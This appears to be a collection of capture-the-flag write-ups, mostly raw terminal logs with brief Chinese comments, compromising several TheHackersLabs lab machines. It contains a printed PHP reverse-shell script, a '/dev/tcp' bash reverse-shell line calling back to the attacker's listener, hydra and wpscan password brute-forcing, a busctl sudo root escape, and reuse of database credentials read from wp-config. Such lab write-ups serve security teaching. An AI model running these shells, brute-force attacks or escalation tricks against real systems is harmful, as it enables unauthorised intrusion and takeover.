(base) yolo@yolo:~$ ssh JaulaCon2025@10.161.196.38 JaulaCon2025@10.161.196.38's password: Linux JaulaCon2025 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Nov 20 15:05:45 2025 from 10.161.155.145 JaulaCon2025@JaulaCon2025:~$ id uid=1001(JaulaCon2025) gid=1001(JaulaCon2025) grupos=1001(JaulaCon2025) JaulaCon2025@JaulaCon2025:~$ ls user.txt JaulaCon2025@JaulaCon2025:~$ cat user.txt 368409a919088e8707d0617365?????? - JaulaCon2025@JaulaCon2025:~$ sudo -l sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido Matching Defaults entries for JaulaCon2025 on JaulaCon2025: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User JaulaCon2025 may run the following commands on JaulaCon2025: (root) NOPASSWD: /usr/bin/busctl JaulaCon2025@JaulaCon2025:~$ sudo /usr/bin/busctl set-property org.freedesktop.systemd1 /org/freedesktop/system d1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2' sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido # id uid=0(root) gid=0(root) grupos=0(root) # cd # cat root.txt 097fac9db83a1806f3355cf952?????? -
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.170.2 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-21 22:13 CST Nmap scan report for 10.161.170.2 Host is up (0.84s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
(base) yolo@yolo:~$ dirsearch -u http://10.161.170.2/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ dirsearch -u http://10.161.170.2/education/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ wpscan --api-token 我的api_key --url http://facultad.thl/edu cation -e u,vp --plugins-detection aggressive _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.28 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ ......省略了一些...... [+] XML-RPC seems to be enabled: http://facultad.thl/education/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://facultad.thl/education/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://facultad.thl/education/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.7.1 identified (Insecure, released on 2024-11-21). | Found By: Rss Generator (Passive Detection) | - http://facultad.thl/education/?feed=rss2, <generator>https://wordpress.org/?v=6.7.1</generator> | - http://facultad.thl/education/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.7.1</generator> | | [!] 2 vulnerabilities identified: | | [!] Title: WP < 6.8.3 - Author+ DOM Stored XSS | Fixed in: 6.7.4 | References: | - https://wpscan.com/vulnerability/c4616b57-770f-4c40-93f8-29571c80330a | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58674 | - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-cross-site-scripting-xss-vulnerability | - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/ | | [!] Title: WP < 6.8.3 - Contributor+ Sensitive Data Disclosure | Fixed in: 6.7.4 | References: | - https://wpscan.com/vulnerability/1e2dad30-dd95-4142-903b-4d5c580eaad2 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58246 | - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-sensitive-data-exposure-vulnerability | - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/ [+] WordPress theme in use: twentytwentyfive | Location: http://facultad.thl/education/wp-content/themes/twentytwentyfive/ | Last Updated: 2025-08-05T00:00:00.000Z | Readme: http://facultad.thl/education/wp-content/themes/twentytwentyfive/readme.txt | [!] The version is out of date, the latest version is 1.3 | [!] Directory listing is enabled | Style URL: http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0 | Style Name: Twenty Twenty-Five | Style URI: https://wordpress.org/themes/twentytwentyfive/ | Description: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design options, suppor... | Author: the WordPress team | Author URI: https://wordpress.org | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.0 (80% confidence) | Found By: Style (Passive Detection) | - http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0, Match: 'Version: 1.0' [+] Enumerating Vulnerable Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:00:08 <==============================> (7343 / 7343) 100.00% Time: 00:00:08 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] akismet | Location: http://facultad.thl/education/wp-content/plugins/akismet/ | Latest Version: 5.6 | Last Updated: 2025-11-12T16:31:00.000Z | | Found By: Known Locations (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/akismet/, status: 403 | | [!] 1 vulnerability identified: | | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) | Fixed in: 3.1.5 | References: | - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357 | - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ | - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html | | The version could not be determined. [+] wp-file-manager | Location: http://facultad.thl/education/wp-content/plugins/wp-file-manager/ | Last Updated: 2025-06-04T11:21:00.000Z | Readme: http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt | [!] The version is out of date, the latest version is 8.0.2 | | Found By: Known Locations (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/wp-file-manager/, status: 200 | | [!] 1 vulnerability identified: | | [!] Title: Multiple elFinder Plugins - Arbitrary File Deletion via Traversal | Fixed in: 8.4.3 | References: | - https://wpscan.com/vulnerability/9569aaa4-719a-4f2e-b5f4-e74fe84e7ad8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0818 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2a166de-3bdf-4883-91ba-655f2757c53b | | Version: 8.0.1 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] Facultad | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] facultad | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 4 | Requests Remaining: 21 [+] Finished: Sat Nov 22 00:36:54 2025 [+] Requests Done: 7426 [+] Cached Requests: 10 [+] Data Sent: 2.119 MB [+] Data Received: 23.79 MB [+] Memory used: 300.465 MB [+] Elapsed time: 00:00:18 (base) yolo@yolo:~$ wpscan --url http://facultad.thl/education -U facultad -P /snap/seclists/rockyou.txt -t 30 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 3.8.28 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://facultad.thl/education/ [10.161.170.2] [+] Started: Sat Nov 22 00:47:35 2025
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 22 00:48:02 2025 [+] Requests Done: 592 [+] Cached Requests: 5 [+] Data Sent: 275.555 KB [+] Data Received: 454.28 KB [+] Memory used: 293.742 MB [+] Elapsed time: 00:00:27
<?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, thendo not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
// // Daemonise ourself if possible to avoid zombies later //
// pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits }
// Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); }
$daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); }
// Change to a safe directory chdir("/");
// Remove any umask we inherited umask(0);
// // Do the reverse shell... //
// Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); }
// Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to );
if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); }
// Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); }
// If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } }
// Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print"$string\n"; } }
$ sudo -u gabri /usr/bin/php shell.php sudo: unable to resolve host TheHackersLabs-facultad.thl: Name or service not known ---新终端中--- ┌─[user@parrot]─[~] └──╼ $nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 10.161.170.2 41246 /bin/sh: 0: can't access tty; job control turned off $ sh: turning off NDELAY mode $ id uid=1001(gabri) gid=1001(gabri) groups=1001(gabri) $
(base) yolo@yolo:~$ ssh vivian@10.161.170.2 The authenticity of host '10.161.170.2 (10.161.170.2)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:31: [hashed name] ~/.ssh/known_hosts:36: [hashed name] ~/.ssh/known_hosts:37: [hashed name] ~/.ssh/known_hosts:47: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.170.2' (ED25519) to the list of known hosts. vivian@10.161.170.2's password: Linux TheHackersLabs-facultad.thl 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have no mail. Last login: Mon Jan 27 22:29:26 2025 from 192.168.1.56 $ id uid=1002(vivian) gid=1002(vivian) grupos=1002(vivian) $ sudo -l sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido Matching Defaults entries for vivian on TheHackersLabs-facultad: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User vivian may run the following commands on TheHackersLabs-facultad: (ALL) NOPASSWD: /opt/vivian/script.sh $ /usr/bin/script -qc /bin/bash /dev/null vivian@TheHackersLabs-facultad:~$ ls user.txt vivian@TheHackersLabs-facultad:~$ nano /opt/vivian/script.sh vivian@TheHackersLabs-facultad:~$ sudo /opt/vivian/script.sh sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido root@TheHackersLabs-facultad:/home/vivian# id uid=0(root) gid=0(root) grupos=0(root)
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.177.114 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-22 16:52 CST Nmap scan report for 10.161.177.114 Host is up (0.89s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) 3306/tcp open mysql MySQL 5.5.5-10.11.6-MariaDB-0+deb12u1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
(base) yolo@yolo:~$ hydra -l premo -P /snap/seclists/rockyou.txt ssh://10.161.177.114 -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 21:01:06 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~224132 tries per task [DATA] attacking ssh://10.161.177.114:22/ [STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344164 to do in 923:03h, 39 active [STATUS] 229.00 tries/min, 687 tries in 00:03h, 14343743 to do in 1043:57h, 32 active [22][ssh] host: 10.161.177.114 login: premo password: cassandra 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 29 final worker threads did not complete until end. [ERROR] 29 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 21:05:43 (base) yolo@yolo:~$ ssh premo@10.161.177.114 The authenticity of host '10.161.177.114 (10.161.177.114)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:31: [hashed name] ~/.ssh/known_hosts:36: [hashed name] ~/.ssh/known_hosts:37: [hashed name] ~/.ssh/known_hosts:47: [hashed name] ~/.ssh/known_hosts:48: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.177.114' (ED25519) to the list of known hosts. premo@10.161.177.114's password: Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 13 20:08:49 2025 from 192.168.18.204 premo@Torrija-TheHackersLabs:~$
premo@Torrija-TheHackersLabs:~$ cat /var/www/html/wordpress/wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** Database username */ define( 'DB_USER', 'admin' ); /** Database password */ define( 'DB_PASSWORD', 'afdvasgvfdsabdgvs6a9vd8sv' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this ifin doubt. */ define( 'DB_COLLATE', '' );
/**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point intime to invalidate all existing cookies. * This will force all users to have to login again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
(base) yolo@yolo:~$ mysql -h 10.161.177.114 -P 3306 -u root -pafdvasgvfdsabdgvs6a9vd8sv Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 143271 Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [(none)]> use Torrijas; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [Torrijas]> show tables; +--------------------+ | Tables_in_Torrijas | +--------------------+ | primo | +--------------------+ 1 row inset (0.002 sec)
MariaDB [Torrijas]> select * from primo; +----+---------+----------------+ | id | usuario | contraseña | +----+---------+----------------+ | 1 | primo | queazeshurmano | +----+---------+----------------+ 1 row inset (0.003 sec)
然后可以直接ssh连上去,提权难度不大
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
(base) yolo@yolo:~$ ssh primo@10.161.177.114 primo@10.161.177.114's password: Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 13 17:21:05 2025 from 192.168.18.204 primo@Torrija-TheHackersLabs:~$ sudo -l sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido Matching Defaults entries for primo on Torrija-TheHackersLabs: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User primo may run the following commands on Torrija-TheHackersLabs: (root) NOPASSWD: /usr/bin/bpftrace
primo@Torrija-TheHackersLabs:~$ sudo -l sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido Matching Defaults entries for primo on Torrija-TheHackersLabs: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User primo may run the following commands on Torrija-TheHackersLabs: (root) NOPASSWD: /usr/bin/bpftrace (ALL) NOPASSWD: ALL primo@Torrija-TheHackersLabs:~$ sudo su sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido root@Torrija-TheHackersLabs:/home/primo# id uid=0(root) gid=0(root) grupos=0(root) root@Torrija-TheHackersLabs:/home/primo# whoami root
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.186.4 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 15:10 CST Nmap scan report for 10.161.186.4 Host is up (0.81s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.47 seconds (base) yolo@yolo:~$ curl http://10.161.186.4 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://casapaco.thl">here</a>.</p> <hr> <address>Apache/2.4.62 (Debian) Server at 10.161.186.4 Port 80</address> </body></html>
// Filtro para bloquear comandos simples $pattern_blacklist = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i'; if (preg_match($pattern_blacklist, $dish)) { die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>'); }
// Permitir solo caracteres y estructuras de comandos más complejas $allowed_pattern = '/^[a-zA-Z0-9\s\$\(\)\-\_\.\|]*$/'; if (!preg_match($allowed_pattern, $dish)) { die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>'); }
# Generar un log de actividad bash -i >& /dev/tcp/10.161.185.232/4444 0>&1
然后新开终端等待反弹shell
1 2 3 4 5 6 7 8 9
┌──(kali㉿kali)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.161.185.232] from (UNKNOWN) [10.161.186.4] 35970 bash: no se puede establecer el grupo de proceso de terminal (1496): Función ioctl no apropiada para el dispositivo bash: no hay control de trabajos en este shell root@Thehackerslabs-CasaPaco:~# id id uid=0(root) gid=0(root) grupos=0(root)
(base) yolo@yolo:~/Desktop/timu/test$ nmap -sV -Pn 10.161.189.31 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 21:33 CST Nmap scan report for 10.161.189.31 Host is up (0.68s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.24.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
(base) yolo@yolo:~/Desktop/timu/test$ dirsearch -u http://10.161.189.31/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~/Desktop/timu/test$ hydra -l superadministrator -P /snap/seclists/rockyou.txt ssh://10.161.189.31 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-23 21:48:24 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://10.161.189.31:22/ [22][ssh] host: 10.161.189.31 login: superadministrator password: princesa 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-23 21:49:21 (base) yolo@yolo:~/Desktop/timu/test$ ssh superadministrator@10.161.189.31 The authenticity of host '10.161.189.31 (10.161.189.31)' can't be established. ED25519 key fingerprint is SHA256:FGZRACBwhyqZdv6wvuqfoIz1l1eoneHbjQfxlQPQz0o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.189.31' (ED25519) to the list of known hosts. superadministrator@10.161.189.31's password: Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-51-generic x86_64)
System information as of Sun Nov 23 01:51:43 PM UTC 2025
System load: 0.15 Usage of /: 14.1% of 49.21GB Memory usage: 7% Swap usage: 0% Processes: 170 Users logged in: 0 IPv4 address for enp0s3: 10.161.189.31 IPv6 address for enp0s3: 2001:da8:1032:6004::3a1
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment.
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately. To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
